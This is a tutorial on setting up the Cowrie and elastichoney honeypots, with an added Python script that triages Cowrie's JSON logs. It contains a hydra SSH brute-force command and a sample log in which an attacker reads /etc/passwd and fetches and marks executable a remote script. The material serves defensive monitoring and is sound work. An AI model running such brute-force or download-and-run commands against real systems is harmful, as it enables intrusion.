Honeypot
What is a honeypot
Honeypot technology is essentially a deception technique aimed at the attacker: hosts, network services or information are deployed as bait to lure the attacker into attacking them, so that the attack can be captured and analysed. This tells the defender which tools and methods the attacker uses and lets them infer the attacker's intent and motive. With a clear picture of the security threats they actually face, the defender can then harden the real systems through technical and management measures.
A honeypot is like an intelligence-gathering system: it deliberately presents targets as bait for the attacker. Once attackers have taken the bait, you can see how they succeeded and keep abreast of the latest vulnerabilities being launched against the server. By following the links between attackers you can also collect the various tools they use and map their social network.
Cowrie (passive mode)
What is Cowrie
Cowrie is a medium-interaction SSH and Telnet honeypot. It records the attacker's brute-force dictionary attempts, the commands they type, and any malicious files they upload or download.
Features:
- Fake file system to which files can be added or removed; it ships with a complete Debian 5.0 file system;
- File contents can be added, so the attacker can run cat /etc/passwd and similar commands; the fake file system contains a minimal set of file contents;
- Session logs are stored in a UML-compatible format, so they can be replayed;
- Files fetched with wget/curl, or uploaded with SFTP and SCP, are saved by Cowrie for later examination;
Installing and running Cowrie
useradd cowrie
passwd cowrie
yum install -y git python-virtualenv bzip2-devel libffi-devel vim net-tools mysql-devel
yum groupinstall -y "Development Tools"
cd /opt                          # the chown below targets /opt/cowrie, so clone there
git clone https://github.com/cowrie/cowrie.git
cd /opt/cowrie
Create a virtual environment
virtualenv -p python2.7 cowrie-env   # python2.7 is what this post used; current Cowrie releases require Python 3
source cowrie-env/bin/activate
# the commands below run inside the Python virtual environment
pip install six packaging appdirs
pip install -r requirements.txt
cp cowrie.cfg.dist cowrie.cfg
chown -R cowrie /opt/cowrie/
Port configuration
The real SSH daemon is moved off port 22 so that port 22 can be handed to the honeypot; Cowrie itself listens on an unprivileged port and the firewall forwards 22 to it.
vim /etc/ssh/sshd_config
...
Port 321          # change "Port 22" to "Port 321"
vim cowrie.cfg    # edit the honeypot configuration
...
listen_port = 2222   # newer Cowrie versions use listen_endpoints = tcp:2222:interface=0.0.0.0 in the [ssh] section instead
Configure the firewall
# open the new administrative SSH port first, so you are not locked out when sshd restarts
firewall-cmd --permanent --add-port=321/tcp
firewall-cmd --zone=public --add-masquerade --permanent
firewall-cmd --zone=public --add-forward-port=port=22:proto=tcp:toport=2222 --permanent
firewall-cmd --permanent --list-all
firewall-cmd --reload
systemctl restart sshd
Configuring the MySQL database
wget https://dev.mysql.com/get/mysql57-community-release-el7-11.noarch.rpm
yum localinstall -y mysql57-community-release-el7-11.noarch.rpm
yum install -y mysql-community-server
systemctl start mysqld
systemctl enable mysqld
systemctl daemon-reload
Python MySQL package
. cowrie-env/bin/activate
pip install mysql-python
Create the database and user that match the [output_mysql] section below, then import /opt/cowrie/docs/sql/mysql.sql:
grep 'temporary password' /var/log/mysqld.log   # MySQL 5.7 generates the initial root password here
mysql -u root -p
CREATE DATABASE cowrie;
CREATE USER 'cowrie'@'localhost' IDENTIFIED BY '123456';   -- use a strong password outside a lab
GRANT ALL ON cowrie.* TO 'cowrie'@'localhost';
FLUSH PRIVILEGES;
USE cowrie;
SOURCE /opt/cowrie/docs/sql/mysql.sql;
Modify the configuration file (cowrie.cfg)
[output_mysql]
enabled = true
host = localhost
database = cowrie
username = cowrie
password = 123456
port = 3306
Testing the attack from Kali
hydra -l root -P ./password.txt -f ssh://IP    # IP is the honeypot's address; -f stops after the first valid password
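After a test like the hydra run above, the interesting part is what the honeypot recorded. The script below is an added example, not code from the original post or from the Cowrie project: it triages Cowrie's JSON log (cowrie.json, one event per line) and reports failed logins per source, which sources crossed a brute-force threshold, the credentials tried, the commands typed in each session, and any files the attacker downloaded. It assumes Cowrie's event names (cowrie.login.failed, cowrie.login.success, cowrie.command.input, cowrie.session.file_download) and the log path /opt/cowrie/var/log/cowrie/cowrie.json; the sample log lines are constructed to resemble what a hydra run followed by an interactive session leaves behind.

```python
"""Triage Cowrie's JSON log after a brute-force test.

Added example; it is not part of the original post or of the Cowrie project.
It assumes Cowrie's JSON output (cowrie.json) with one event per line and the
event names cowrie.login.failed / cowrie.login.success / cowrie.command.input /
cowrie.session.file_download. The sample log below is constructed.
"""
import json
import sys
from collections import Counter, defaultdict

# Constructed sample log (one JSON object per line). The last line is deliberately
# truncated, as happens when the file is read while Cowrie is still writing it.
SAMPLE_LOG = """
{"eventid": "cowrie.session.connect", "src_ip": "10.0.0.5", "session": "a1b2c3d4", "timestamp": "2020-01-01T10:00:00.000000Z"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "123456", "src_ip": "10.0.0.5", "session": "a1b2c3d4", "timestamp": "2020-01-01T10:00:01.000000Z"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "password", "src_ip": "10.0.0.5", "session": "a1b2c3d4", "timestamp": "2020-01-01T10:00:02.000000Z"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "qwerty", "src_ip": "10.0.0.5", "session": "a1b2c3d4", "timestamp": "2020-01-01T10:00:03.000000Z"}
{"eventid": "cowrie.login.success", "username": "root", "password": "toor", "src_ip": "10.0.0.5", "session": "a1b2c3d4", "timestamp": "2020-01-01T10:00:04.000000Z"}
{"eventid": "cowrie.command.input", "input": "cat /etc/passwd", "src_ip": "10.0.0.5", "session": "a1b2c3d4", "timestamp": "2020-01-01T10:00:10.000000Z"}
{"eventid": "cowrie.command.input", "input": "wget http://198.51.100.7/x.sh", "src_ip": "10.0.0.5", "session": "a1b2c3d4", "timestamp": "2020-01-01T10:00:20.000000Z"}
{"eventid": "cowrie.session.file_download", "url": "http://198.51.100.7/x.sh", "shasum": "0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef", "src_ip": "10.0.0.5", "session": "a1b2c3d4", "timestamp": "2020-01-01T10:00:21.000000Z"}
{"eventid": "cowrie.command.input", "input": "chmod +x x.sh", "src_ip": "10.0.0.5", "session": "a1b2c3d4", "timestamp": "2020-01-01T10:00:25.000000Z"}
{"eventid": "cowrie.login.failed", "username": "admin", "password": "admin", "src_ip": "10.0.0.9", "session": "e5f6a7b8", "timestamp": "2020-01-01T10:05:00.000000Z"}
{"eventid": "cowrie.session.closed", "src_ip": "10.0.0.5", "session": "a1b2c3d4", "timestamp": "2020-01-01T10:01:00.000000Z"}
{"eventid": "cowrie.command.input", "input": "id", "src_ip": "10.0.0.9", "session": "e5f6a7b8"
"""


def parse_log(text):
    """Parse one JSON event per line; skip blank and malformed (partially written) lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def summarize(events, bruteforce_threshold=3):
    """Aggregate login attempts, commands and downloads; flag sources at or above the threshold."""
    failed = Counter()          # failed logins per source IP
    creds = Counter()           # (username, password) pairs tried
    succeeded = []              # (src_ip, username, password) that got in
    session_ip = {}             # session id -> source IP, for correlating commands
    commands = defaultdict(list)
    downloads = []
    for ev in events:
        eid = ev.get("eventid", "")
        sid = ev.get("session")
        ip = ev.get("src_ip", "?")
        if sid:
            session_ip.setdefault(sid, ip)
        if eid == "cowrie.login.failed":
            failed[ip] += 1
            creds[(ev.get("username"), ev.get("password"))] += 1
        elif eid == "cowrie.login.success":
            succeeded.append((ip, ev.get("username"), ev.get("password")))
            creds[(ev.get("username"), ev.get("password"))] += 1
        elif eid == "cowrie.command.input":
            commands[sid].append(ev.get("input", ""))
        elif eid == "cowrie.session.file_download":
            downloads.append({"session": sid, "url": ev.get("url"), "shasum": ev.get("shasum")})
    bruteforce = sorted(ip for ip, n in failed.items() if n >= bruteforce_threshold)
    return {
        "failed_by_ip": dict(failed),
        "top_credentials": creds.most_common(5),
        "successful_logins": succeeded,
        "commands": dict(commands),
        "downloads": downloads,
        "bruteforce_sources": bruteforce,
        "session_ip": session_ip,
    }


def report(summary):
    """Render the summary as plain text for the terminal."""
    lines = ["Failed logins per source IP:"]
    for ip, n in sorted(summary["failed_by_ip"].items(), key=lambda kv: -kv[1]):
        flag = "  <- brute force" if ip in summary["bruteforce_sources"] else ""
        lines.append("  %s: %d%s" % (ip, n, flag))
    lines.append("Successful logins:")
    for ip, user, pw in summary["successful_logins"]:
        lines.append("  %s  %s:%s" % (ip, user, pw))
    lines.append("Commands per session:")
    for sid, cmds in summary["commands"].items():
        lines.append("  %s (%s): %s" % (sid, summary["session_ip"].get(sid, "?"), "; ".join(cmds)))
    lines.append("Downloaded files (check the sha256 against threat intel before opening):")
    for d in summary["downloads"]:
        lines.append("  %s  sha256=%s" % (d["url"], d["shasum"]))
    return "\n".join(lines)


if __name__ == "__main__":
    # Usage: python cowrie_triage.py /opt/cowrie/var/log/cowrie/cowrie.json
    # (log path assumed; with no argument the constructed sample is used)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    print(report(summarize(parse_log(text))))
```

The brute-force threshold is deliberately low so that a single hydra run trips it; in production you would raise it and key on username/password diversity per source as well, since a real attacker's dictionary run looks exactly like the test above. The malformed final line is skipped rather than aborting the run, because Cowrie writes the log continuously and a triage script will regularly see a half-written last line.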
Honeypot: elastichoney
Configuring the Go environment
Environment variables:
vim ~/.bashrc
...
export GOROOT=/usr/local/go
export GOPATH=/opt/goblog
export PATH=$PATH:$GOPATH/bin:$GOROOT/bin   # binaries built by go get land in $GOPATH/bin
source ~/.bashrc                             # reload the file that was just edited
Downloading the code
go get github.com/fw42/go-hpfeeds            # GOPATH-mode dependency fetch; elastichoney predates Go modules
git clone https://github.com/jordan-wright/elastichoney.git
Edit config.json (the file passed with -config below) before running the honeypot:
Build and run
cd elastichoney
mkdir -p logs                                 # make sure the log directory passed with -log exists
go build -o elastichoney
./elastichoney -config="config.json" -log="logs/elastichoney.log" -verbose=true